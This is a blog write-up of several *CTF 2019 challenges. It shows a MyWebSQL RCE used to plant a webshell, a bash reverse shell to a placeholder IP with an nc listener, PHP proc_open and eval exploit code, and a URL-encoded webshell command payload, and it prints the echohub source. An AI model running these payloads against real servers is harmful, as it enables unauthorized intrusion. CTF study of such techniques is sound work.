
2019-04-30 ctf

starctf2019

mywebsql

Log in with the weak credentials admin/admin. Searching online for CVEs in MyWebSQL turns up an RCE; following its steps, generate a webshell, connect with AntSword (蚁剑), and download the readflag binary from the directory of the same name. I had no real idea what to do next, so I consulted a senior player's blog.

Running the readflag binary (/readflag) prints:

Solve the easy challenge first
(((((886366)-(-362092))+(188748))-(-638404))-(-286590))
input your answer: calculate error!

and then it exits immediately.
Create a new .sh file in the /backups directory (this directory has the most permissive rights), with the following contents:

bash -i >& /dev/tcp/Your IP/8888 0>&1

Listen on your own VPS:

nc -lvvp 8888

The reverse shell comes back successfully.

Opening the readflag binary in IDA, note the call to ualarm, whose man page says:

Description
The ualarm() function causes the signal SIGALRM to be sent to the invoking process after (not less than) usecs microseconds. The delay may be lengthened slightly by any system activity or by the time spent processing the call or by the granularity of system timers.

Unless caught or ignored, the SIGALRM signal will terminate the process.

If the interval argument is nonzero, further SIGALRM signals will be sent every interval microseconds after the first.

Note this sentence:
Unless caught or ignored, the SIGALRM signal will terminate the process.
So we try to catch SIGALRM.
Reference found: https://www.cnblogs.com/maxgongzuo/p/6372898.html
Use: trap '' 14
In bash, trap '' 14 sets signal 14 (SIGALRM) to ignored, and an ignored disposition is inherited across exec, so /readflag started from that shell is no longer killed by its own alarm.
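The following C program is an added illustration, not code from the writeup or from the challenge: it reproduces the two halves of the readflag behaviour described above. The first function arms ualarm() in a child and shows that the child dies from SIGALRM under the default disposition but survives when SIGALRM is ignored; the second sets the disposition before execve(), the way trap '' 14 does in bash, and shows that the ignored disposition carries over into the executed program. /bin/sh (assumed to exist) stands in for /readflag and sends signal 14 to itself with kill; the 10 ms / 200 ms timings are arbitrary constructed values.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1
#endif
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

/* Decoded fate of a child process. */
enum outcome { EXITED_OK = 0, KILLED_BY_ALARM = 1, OTHER = 2 };

static enum outcome decode_status(int status)
{
    if (WIFSIGNALED(status))
        return WTERMSIG(status) == SIGALRM ? KILLED_BY_ALARM : OTHER;
    if (WIFEXITED(status) && WEXITSTATUS(status) == 0)
        return EXITED_OK;
    return OTHER;
}

static enum outcome wait_for(pid_t pid)
{
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return OTHER;
    return decode_status(status);
}

/* Case 1: the child arms ualarm() itself, as readflag does, then keeps
 * working past the deadline.  With the default disposition the SIGALRM
 * terminates it; with SIG_IGN the signal is simply discarded. */
enum outcome run_ualarm_child(int ignore_alarm)
{
    pid_t pid = fork();
    if (pid < 0)
        return OTHER;
    if (pid == 0) {
        if (ignore_alarm)
            signal(SIGALRM, SIG_IGN);
        ualarm(10000, 0);                               /* SIGALRM after 10 ms (constructed value) */
        struct timespec ts = { 0, 200L * 1000 * 1000 }; /* "work" for 200 ms, well past the alarm */
        nanosleep(&ts, NULL);
        _exit(0);
    }
    return wait_for(pid);
}

/* Case 2: the disposition is set before execve(), which is what
 * `trap '' 14` in bash arranges for every command it spawns.  SIG_IGN
 * survives exec, so the new program starts with SIGALRM ignored.
 * /bin/sh stands in for /readflag here (assumption) and raises signal 14
 * on itself; `exit 0` is only reached if the signal was ignored. */
enum outcome run_exec_child(int ignore_alarm)
{
    pid_t pid = fork();
    if (pid < 0)
        return OTHER;
    if (pid == 0) {
        if (ignore_alarm)
            signal(SIGALRM, SIG_IGN);
        execl("/bin/sh", "sh", "-c", "kill -14 $$; exit 0", (char *)NULL);
        _exit(127);                                     /* exec failed */
    }
    return wait_for(pid);
}

static const char *describe(enum outcome o)
{
    return o == EXITED_OK ? "exited normally"
         : o == KILLED_BY_ALARM ? "killed by SIGALRM" : "other";
}

int main(void)
{
    printf("ualarm, default disposition : %s\n", describe(run_ualarm_child(0)));
    printf("ualarm, SIGALRM ignored     : %s\n", describe(run_ualarm_child(1)));
    printf("exec,   default disposition : %s\n", describe(run_exec_child(0)));
    printf("exec,   SIGALRM ignored     : %s\n", describe(run_exec_child(1)));
    return 0;
}
```

The second case is the one that matters for the challenge: nothing inside readflag changes, only the disposition it inherits from the shell that launched it, which is exactly why a one-line trap in the reverse shell is enough.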

Finally:

Solve the easy challenge first
(((((-95329)-(-655048))+(-432249))+(476302))-(-374607))
input your answer: 978379
ok! here is your flag!!
*ctf{h4E9PKLkr6HTO3JcRglVdYaBSA0eDU8y}

Method 2: from the official writeup
Create an exp.php:

<?php
$descriptorspec = array(
    0 => array("pipe", "r"),  // stdin: the child reads from this pipe
    1 => array("pipe", "w"),  // stdout: the child writes to this pipe
    2 => array("file", "/tmp/error-output.txt", "a") // stderr: appended to a file
);
$cwd = '/tmp';
$env = array('some_option' => 'aeiou');
$process = proc_open('/readflag', $descriptorspec, $pipes, $cwd, $env);
if (is_resource($process)) {
    // $pipes now looks like this:
    // 0 => handle for writing to the child's stdin
    // 1 => handle for reading the child's stdout
    // error output is appended to /tmp/error-output.txt
    //fwrite($pipes[0], '');
    //fclose($pipes[0]);
    $output1 = fread($pipes[1], 1024);   // banner line
    var_dump($output1);
    $output2 = fread($pipes[1], 1024);   // the arithmetic expression
    var_dump($output2);
    $output3 = fread($pipes[1], 1024);   // the "input your answer:" prompt
    var_dump($output3);

    $calc = trim($output2);
    $an = eval("return $calc;");         // let PHP evaluate the expression
    var_dump($an);
    fwrite($pipes[0], (string)$an."\n"); // send the answer to the child's stdin
    $output = stream_get_contents($pipes[1]);
    var_dump($output);
    // Remember: close all pipes before calling proc_close to avoid a deadlock.
    fclose($pipes[0]);
    fclose($pipes[1]);
    $return_value = proc_close($process);
    echo "command returned $return_value\n";
}
?>

Running it gives:

PHP Notice: Undefined variable: output in /var/www/html/backups/exp.php on line 18
NULL
PHP Notice: Undefined variable: output in /var/www/html/backups/exp.php on line 20
NULL
PHP Notice: Undefined variable: output in /var/www/html/backups/exp.php on line 22
NULL
int(-1669937)
string(63) "ok! here is your flag!!
*ctf{h4E9PKLkr6HTO3JcRglVdYaBSA0eDU8y}
"
command returned 0

Method 3 (somewhat similar to method 2):

http://targeturl/backups/123456.php?cmd=$d=array(0=%3Earray(%22pipe%22,%22r%22),1=%3Earray(%22pipe%22,%22w%22));$fp=proc_open(%22../../../../readflag%22,$d,$pipes);$a=fgets($pipes[1]);$x=fgets($pipes[1]);$ret=eval(%22return%20$x;%22);echo%20$ret.%22%3CBR%3E%22;$emm=fwrite($pipes[0],strval($ret));echo%20$emm.%22%3CBR%3E%22;fclose($pipes[0]);$c=fgets($pipes[1]);$e=fgets($pipes[1]);echo%20$c.%20$e.%22%3CBR%3E%22;fclose($pipes[1]);proc_close($fp);

The proc_open function

she

A game; download RPG Maker XP.
Create a new project, copy the files under she into the project directory, then reopen the project and it can be edited.

echohub

Looking at the page source, note:


<!--/?source=1-->
<pre>
.----------------. .----------------. .----------------. .----------------. .----------------. .----------------. .----------------.
| .--------------. || .--------------. || .--------------. || .--------------. || .--------------. || .--------------. || .--------------. |
| | _________ | || | ______ | || | ____ ____ | || | ____ | || | ____ ____ | || | _____ _____ | || | ______ | |
| | |_ ___ | | || | .' ___ | | || | |_ || _| | || | .' `. | || | |_ || _| | || ||_ _||_ _|| || | |_ _ \ | |
| | | |_ \_| | || | / .' \_| | || | | |__| | | || | / .--. \ | || | | |__| | | || | | | | | | || | | |_) | | |
| | | _| _ | || | | | | || | | __ | | || | | | | | | || | | __ | | || | | ' ' | | || | | __'. | |
| | _| |___/ | | || | \ `.___.'\ | || | _| | | |_ | || | \ `--' / | || | _| | | |_ | || | \ `--' / | || | _| |__) | | |
| | |_________| | || | `._____.' | || | |____||____| | || | `.____.' | || | |____||____| | || | `.__.' | || | |_______/ | |
| | | || | | || | | || | | || | | || | | || | | |
| '--------------' || '--------------' || '--------------' || '--------------' || '--------------' || '--------------' || '--------------' |
'----------------' '----------------' '----------------' '----------------' '----------------' '----------------' '----------------'

Welcome to random stack ! Try to execute `/readflag` :P

</pre>

<form action="/" method="post">root > <input name="data" placeholder="input some data"></form>O0OO0stack

This yields the source:

<?php
$banner = <<<EOF
<!--/?source=1-->
<pre>
.----------------. .----------------. .----------------. .----------------. .----------------. .----------------. .----------------.
| .--------------. || .--------------. || .--------------. || .--------------. || .--------------. || .--------------. || .--------------. |
| | _________ | || | ______ | || | ____ ____ | || | ____ | || | ____ ____ | || | _____ _____ | || | ______ | |
| | |_ ___ | | || | .' ___ | | || | |_ || _| | || | .' `. | || | |_ || _| | || ||_ _||_ _|| || | |_ _ \ | |
| | | |_ \_| | || | / .' \_| | || | | |__| | | || | / .--. \ | || | | |__| | | || | | | | | | || | | |_) | | |
| | | _| _ | || | | | | || | | __ | | || | | | | | | || | | __ | | || | | ' ' | | || | | __'. | |
| | _| |___/ | | || | \ `.___.'\ | || | _| | | |_ | || | \ `--' / | || | _| | | |_ | || | \ `--' / | || | _| |__) | | |
| | |_________| | || | `._____.' | || | |____||____| | || | `.____.' | || | |____||____| | || | `.__.' | || | |_______/ | |
| | | || | | || | | || | | || | | || | | || | | |
| '--------------' || '--------------' || '--------------' || '--------------' || '--------------' || '--------------' || '--------------' |
'----------------' '----------------' '----------------' '----------------' '----------------' '----------------' '----------------'

Welcome to random stack ! Try to execute `/readflag` :P

</pre>

<form action="/" method="post">root > <input name="data" placeholder="input some data"></form>
EOF;
echo $banner;
if(isset($_GET['source'])){
$file = fopen("index.php","r");
$contents = fread($file,filesize("index.php"));
echo "---------------sourcecode---------------";
echo base64_encode($contents);
echo "----------------------------------------";
fclose($file);
//Dockerfile here
echo "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";
highlight_file(__FILE__);

}
$disable_functions = ini_get("disable_functions");
$loadext = get_loaded_extensions();
foreach ($loadext as $ext) {
if(in_array($ext,array("Core","date","libxml","pcre","zlib","filter","hash","sqlite3","zip"))) continue;
else {
if(count(get_extension_funcs($ext)?get_extension_funcs($ext):array()) >= 1)
$dfunc = join(',',get_extension_funcs($ext));
else
continue;
$disable_functions = $disable_functions.$dfunc.",";

}
}
$func = get_defined_functions()["internal"];
foreach ($func as $f){
if(stripos($f,"file") !== false || stripos($f,"open") !== false || stripos($f,"read") !== false || stripos($f,"write") !== false){
$disable_functions = $disable_functions.$f.",";
}
}

ini_set("disable_functions", $disable_functions);
ini_set("open_basedir","/var/www/html/:/tmp/".md5($_SERVER['REMOTE_ADDR'])."/");

Author: damn1t

Link: http://microvorld.com/2019/04/30/CTF/starctf2019/

Copyright: All articles in this blog are licensed under CC BY-NC-SA 3.0 unless stated otherwise.
